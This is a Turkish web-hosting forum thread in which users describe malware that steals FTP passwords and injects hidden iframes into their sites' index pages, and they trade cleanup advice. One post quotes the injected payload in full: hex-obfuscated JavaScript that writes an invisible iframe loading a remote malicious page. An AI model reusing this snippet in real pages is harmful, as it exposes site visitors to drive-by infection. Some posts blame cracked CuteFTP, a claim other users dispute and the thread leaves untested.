virus uyarisi

[emremer]

Evet gayet kurnazca hazırlanmış.

Arkadaşın flash diski ile dışardan virüs getirdiğini düşüyorduk. Format attığım ve anti virüs programları da kurduğum halde bir süre sonra yine çıkıyordu meydana. En az 4-5 formattan sonra anladımki bulaşan program öncelikle index sayfalarına ve diğer bazı sayfalara iframe eklemiş. Anti-virüs programı da uyarı vermiyordu çünkü sıradan bir html kodu.. ki kendisi yok, ancak çalıştığında hemen çağrılıyor.

Herhangi bir değişiklikte kendi ellerimle upload ediyormuşum.
Paranoya modunda yüzlerce dosyayı tek tek inceyip iframe leri sildim.
ve Ftp vb. şifreleri değiştirdikten sonra tam olarak kurtuldum.

Fakat arada Google, Kara listeye aldı, bu site bilgisayarınıza zarar verir vs..
Hit 17bin lerden binlere düştü, 1-2 numarada gelen aramalarda 400. sıralara düştü,
Kullanıcılardan sitemler geldi..
vs..

Vel hasıl, olay fena halde sarstı.
Sizin sitenizden bu uyarı alıyorsanız, bir formatlık işi var deyip geçmeyin..

- Format atın,

- İnternete bağlanmadan önce, (bazen header.php yada footer.php lere de kod ekliyor o yüzden) makinanızdaki tüm web sayfalarının (.htm .html .asp .php .shtml ...) kodlarını gözden geçirin, iframeleri silin.

- (Mümkünse DC/Host adminlerde isteyerek) whm-ftp vb.. şifrelerinizi tüm siteleriniz için değiştirin.

- İnternete bağlanın, nod32 gibi herşeyden huylanan bir antivirüsin son sürümünü kurun, (yedeklerinizden değil, en yenisi indirerek) güncelleyin.

- Yeni bir FTP programı kurun (yine yedeklerinizden değil, en yenisi indirerek)

- Zararlı iframelerden ayıklanmış kodlarınızı bir an önce mevcut dosyalarınızın üzerine upload edin(ki google/stanford sitenizi trojan yayarken kara listeye almasın)

- Evet sonunda kurtulduk.

- - -
mu acaba?

Aradan zaman geçti, sorunu unutmuştunuz.. başka bir sebebten dolayı backuplarınızdan birkaç şeyi geri almak durumunda kaldınız. Bingo! ...ve süreç yeniden işlemeye başladı...

- Bunu yaşamamak için, tüm backuplarınızı silip yenilerini alın.

[McLee]

sunucumda bi reseller hesabı altındaki bütün sitelere olmuştu bu. Hepsinin indexine iframe kodu eklenmişti. Reseller verdiğim kişi bana sunucunda virus var dedi ve ben sunucuyu rkhunter clamav bitdefender ile tarattım sorun yoktu.

Reseller verdiğim kişiye dedim pc de trojan olabilir senin sadece senin resel altındaki sitelere oldu bu dedim ve format attı sonra indexlerini değişti sorun ortadan kalktı.

Müşterileriniz pass larını kaptırıyor olabilir bunu da göz önüne alalım.

Saygılar

[Gurbetseli]

Merhaba Arkadaslar... Ne olur Yalvaririm Buna bir cahare.. tam 3 defa bilgisayara format attim her format attigimdada bana gerekli olan tüm programlari yeniden yüküyorum photoshop,cuteftp,prontpage kaysper vürüs programi ve bunun gibi yaklasin 5 veya6 tane büyük programlari kuruyorum.. hersey normal gidiyor sonra bir bakiyorum index.html veya index.php dosyalarin icinde kodlar cikiyor... temizliyorum gene geliyorlar... aglamak üzereyim.. haa bu ara resellerim var ve 3 müsterimdede ayni sorun var onlarinda sitelerinde froumalrinda yukarda kücük kare icerinde sayfa görüntülenemiyor diyor.. napacagimi bilmiyorum. biktim müsterilerin sitelerini silip yedeklrini yükleyelim diyorum.. yok diyorlar üyeler forumlar felan gider diyorlar.. napacagimi bilmiyorum. ben kendi bilgisayarimdan vaz gectim bari müsterilerin sitelerini kurtarsam yeter...
ALLAH Rizasi icin biri bana bunun cözümünü göstersin...Neolur.... Birde bu ftp deki index.php ve index.html dosyalarinin icindeki kodlari toplu halde silmenin yolu yokmu bir programi felan yokmu...asagiya indexlerde eklenen kodlari yaziyorum. kodlar sanki zenle sifrelenmis gibi karisik kurusuk harfler felan birde sitelerin köselerinde cikan karenin icinde sayfa görüntülenemiyor yazinina ters tiklayip özellikler dedigimde bana adres olarak bunu veriyor... http://gazenvagen.com/img/index.php/%22 adres.. ama bisey anladim... isde kodlari ekliyorum..

PHP Code:

<!-- o --><script type="text/javascript">function fflrzptsamvk(cjrmtjijwuugzoi){var eckamjcvappjyyg="";for(hammmelb=0;hammmelb<cjrmtjijwuugzoi.length;hammmelb+=2){eckamjcvappjyyg+=(String.fromCharCode(parseInt(cjrmtjijwuugzoi.substr(hammmelb,2),16)));}document.write(eckamjcvappjyyg);}fflrzptsamvk("3C696672616D65207372633D5C22687474703A2F2F67617A656E766167656E2E636F6D2F696D672F696E6465782E7068705C22206672616D65626F726465723D5C22305C2220626F726465723D5C22305C222077696474683D5C22305C22206865696768743D5C22305C22207374796C653D5C22706F736974696F6E3A206162736F6C7574653B207669736962696C6974793A2068696464656E3B20646973706C61793A206E6F6E655C223E3C2F696672616D653E");</script><!-- c --> 


Lütfen Ne olru ftp den toplu olrak nasil silerim bunu.. ve bridaha nasil gelmemesini saglarim..

Simdiden Tesekkür ederim...

[volkandesign]

Arkadaşlar Bu cuteFtp den geliyormus sanirim eger cuteftp programını cracklediyseniz o crack sayesinde bütün girdiğiniz ftplere bu iframeyi otomatik veriyor cutefpt 7 cracklisini kullanmayin siln ve bütün şifrelerinizi değiştirin sorun kalmayacaktır.

[Onur]

Cuteftp ile alakası yok.Siz öyle dedikten sonra bizzat denedim.

[volkandesign]

valla bende o şekilde düzeldi

[Webci]

Arkadaşlar merhaba,

<script><eval> diye başlayan trojan ordusu ile çarpışmalarım yaklaşık 24 saat önce son buldu diyecektim ki, sitelerden bir tanesinde yine aynı durum hasıl oldu. Permision ları ne yaparsak yapalım kendisini çoğaltmayı ve dosyaların içine yazmayı başaran Trojen lerle baş etmek için yardımınız gerekiyor. Şu an makinanın üzerinde;

CentOS4 64 Bit var.
Bitdeffinder + Clam + Kaspersky + Avg ve Kurulup kaldırılan Panda çözüm olamadı.
En sonunda index dosyaları giderse gitsin deyip makinadaki index lerin hepsini temizlettim. İşte o an benim bittiğim andı. Çünkü bir tanesi hangi dosyaya saklandıysa kurtulmuş. Çıldırma noktasına gelmek üzereyim.

Makina geçen ay format yedi. Tekrar format dersek müşterilerle çok kötü papaz olacağız. Hepsi firma. O değil bir tanesi neredeyse sadece siteden satış yapıyor.

Yardımlarınız lazım arkadaşlar en acilinden. Index ler yok ama TRO halen var (

İyi çalışmalar.

[whmci]

Merhaba arkadaşlar tüm yorumları okudum. Bu olay bende de vardı. Bu torjan midir virus müdür nedir, ama kesin olarak CUTEFTP'den bulaşıyor. Eğer crackli kullanıyorsanız silin (8.0 için konuşuyorum.).. Ben tüm index'leri aldım temizledim şuan sorun yok. Sonra makinanıza format atın. Aynen bende öyle yaptım. sorun ok şuan...

Ama bunu yazan güzel yazmış Çok çabuk yayılıyor ve reklam amaçlı gıcık birşey.

[Zaza]

1- Uyari Server Kaynaklı Mı Yoksa Kendi Pcnde Mi problem var ilk olarak bunu anla Anlamak icin > farklı bir pc ye gec (temiz pc olsun ) gir whmye panel ve ftp sifrelerini değiş sonra indexlerindeki frame kodlarini sil. Sonrasinda Bekle Eğer yine kodlar cıkarsa sitende problem server kaynaklıdır eğer cıkmaz ise pcnde bircesit malware(trojen,keylooger,spy vs) vardir. Kolay Gelsin

[PowerUseR]

Bu sorun genelde tüm hosting isi ile ugrasan arkadasların basına gelmistir benım de geldi..
olay su
kurban bu virusu yer daha sonra win altından calısmaya baslar eger kurban bir ftp hesabına baglanırsa. virus ftp sifresini ve loginini kayıt eder ve kendini ilk acılıs sayfalarına otomatik yazar i( index.php index.html index.asp default.asp v.s ) virus kendini tüm ana dizin ve altdizinlerdeki indexlere kendini yazabilir

benim bildigim ve tecrübe ettigim cözümü..

1. sayfadan kod temizlenecek
2. ftp sifresi degisecek
3. kurban pc ye format atıcak yada birsekilde temizliyecek ( format atması daha saglıklı)
4 format yada temizleme işlemi olmadan ftp hesabına asla girilmiyecek

bunları yaptıkdan sonra bir kac güb bekleyin.. olay tekerür etmezse sorun hal olmus demektir